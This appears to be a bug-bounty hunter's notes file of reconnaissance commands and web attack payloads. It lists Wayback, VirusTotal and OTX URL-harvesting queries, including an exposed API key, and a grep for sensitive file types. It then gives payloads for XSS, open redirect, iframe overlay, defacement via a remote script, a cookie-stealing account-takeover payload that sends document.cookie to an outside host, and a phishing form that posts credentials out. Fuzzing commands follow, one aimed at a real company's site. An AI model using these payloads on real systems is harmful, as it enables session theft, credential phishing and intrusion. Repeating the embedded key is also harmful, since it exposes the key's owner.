========================================================================================================================================

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

https://www.virustotal.com/vtapi/v2/domain/report?apikey=982680b1787fa59701919aa22515a025e00df1e3bb2bc4f186b8e919558d576c&domain=example.com

https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1

curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt

cat out.txt | uro |  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'

========================================================================================================================================

payload for testing HTML/XSS/IFRAME/ATO/PHISHING

HTMLi:
<font color="red">ERROR 1064 (42000): You have an error in your SQL syntax;

Redirect:
"/><img src="x"><a href="https://evil.com">login</a>
<h1><font Color=red>Visit  Our  New  WebSite </h1><h3><mark><a href="https://example.com">e x a m p l e . c o m </a></mark></h3>

RXSS:
<img src/onerror=prompt(document.cookie)>

IFrame:
"><iframe src="https://www.cia.gov/" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

ATO:
<img src=x  onerror="document.location='http://o0p70yehe4avf6728g095671asgj49sy.oastify.com?c='+document.cookie;" />

PHISHING:
<h3>Please login to proceed</h3> <form action=http://zgj49ubrlvka5wgrek9bc0eryi49s0io7.oastify.com>
Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br>

Deface:
e%27"()%26%25<zzz>%27"><script%20src=https://jso-tools.z-x.my.id/raw/~/RD9CXXDM006AY></script>

Xss Alert:
e%27"()%26%25<zzz><ScRiPt%20>alert(9155)</ScRiPt>


--------------------------------------------------------------------------------------------------------------------------
<input type="submit" value="Login"></br>

My preferred fuzzing method:

ffuf -w facundo.txt -u https://tesla.com/FUZZ -mc all -c -v \
-H "User-Agent: Mozilla/5.0" -H "Accept: */*" \
-X GET -r -t 100 -p 0.1-1.0 -maxtime 3600 -o results.json -of json -od results \
-mc 200,301,302,307,401,403,500 -ac -recursion -recursion-depth 2 -rate 50 \

dirsearch -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json  -u https://adminblog.abc.com/

subprober -f all.txt -tl -sc -sv -l -cn -ar -o output.txt -nc -mc 200 301 302 307 308 403 401 -c 20

